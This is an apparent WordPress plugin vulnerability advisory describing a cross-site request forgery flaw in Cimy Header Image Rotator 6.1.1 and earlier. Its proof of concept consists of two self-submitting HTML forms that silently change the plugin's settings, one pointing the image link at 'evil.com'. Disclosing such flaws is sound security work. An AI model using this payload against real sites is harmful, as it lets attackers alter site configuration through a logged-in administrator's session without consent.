WordPress Plugin Vulnerabilities
Cimy Header Image Rotator <= 6.1.1 - Arbitrary Settings Update via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Proof of Concept
<form id="test" action="https://example.com/wp-admin/options-general.php?page=cimy_header_image_rotator#cimy_hir_file_options" method="POST"> <input type="text" name="filelinks[69wclb.jpg]" value=""> <input type="text" name="filetext[69wclb.jpg]" value=""> <input type="text" name="filelinks[69wcmd.jpg]" value=""> <input type="text" name="filetext[69wcmd.jpg]" value=""> <input type="text" name="submitButtonName" value="Änderungen speichern"> </form> <script> document.getElementById("test").submit(); </script> <form id="test" action="https://example.com/wp-admin/options-general.php?page=cimy_header_image_rotator#cimy_hir_file_options" method="POST"> <input type="text" name="cimy_hir_post" value="1"> <input type="text" name="hir_name" value="Main"> <input type="text" name="hir_images_source" value="plugin"> <input type="text" name="hir_swap_rate" value="3"> <input type="text" name="hir_swap_type" value="s"> <input type="text" name="hir_div_id" value="cimy_div_id_0"> <input type="text" name="hir_border" value="1"> <input type="text" name="hir_div_width" value="400"> <input type="text" name="hir_div_height" value="200"> <input type="text" name="hir_fade" value="0"> <input type="text" name="hir_move_effect" value="none"> <input type="text" name="hir_speed" value="10"> <input type="text" name="hir_from_topleft_zoom" value="1"> <input type="text" name="hir_to_bottomright_zoom" value="1.5"> <input type="text" name="hir_from_bottomright_zoom" value="1"> <input type="text" name="hir_to_topleft_zoom" value="1.5"> <input type="text" name="hir_from_topright_zoom" value="1"> <input type="text" name="hir_to_bottomleft_zoom" value="1.5"> <input type="text" name="hir_from_bottomleft_zoom" value="1"> <input type="text" name="hir_to_topright_zoom" value="1.5"> <input type="text" name="hir_start_from" value="image_zero"> <input type="text" name="hir_file_link" value="https://evil.com"> <input type="text" name="hir_link_target" value="_blank"> <input type="text" name="hir_file_text" value=""> <input type="text" name="submitButtonName" value="Änderungen speichern"> </form> <script> document.getElementById("test").submit(); </script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-06-01 (about 1 years ago)
Added
2022-06-01 (about 1 years ago)
Last Updated
2023-03-02 (about 1 years ago)